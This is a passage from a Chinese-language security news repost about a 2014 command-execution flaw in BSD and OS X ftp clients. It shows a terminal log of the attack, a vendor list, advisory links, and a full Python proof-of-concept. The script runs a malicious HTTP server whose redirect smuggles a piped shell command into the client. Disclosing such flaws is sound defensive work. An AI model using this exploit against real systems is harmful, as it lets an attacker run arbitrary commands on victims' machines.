a20$ a20$ ftp http://localhost/cgi-bin/redirect Trying ::1:80 ... ftp: Can"t connect to `::1:80": Connection refused Trying 127.0.0.1:80 ... Requesting http://localhost/cgi-bin/redirect Redirected to http://192.168.2.19/cgi-bin/|uname%20-a Requesting http://192.168.2.19/cgi-bin/|uname%20-a 32 101.46 KiB/s 32 bytes retrieved in 00:00 (78.51 KiB/s) NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014 Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE BOARD evbarm
a20$漏洞影响范围及公告Debian, Red Hat, Gentoo, Novell (SUSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告: 漏洞检测脚本(请勿用于非法用途)#!/usr/bin/env python """ Sample OSX/BSD FTP client exploit. Written because ISO policies were doing my head in. To exploit, edit the value of the cmd variable, then run the script. To test:
hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "
Stopped serving."解决方案和更详细的内容参见:http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464 http://seclists.org/oss-sec/2014/q4/460[参考信息来源nix-systems-affected-ftp-remote-command-execution-vulnerability]本文转载自: http://www.freebuf.com/news/49411.html
易网时代-编程资源站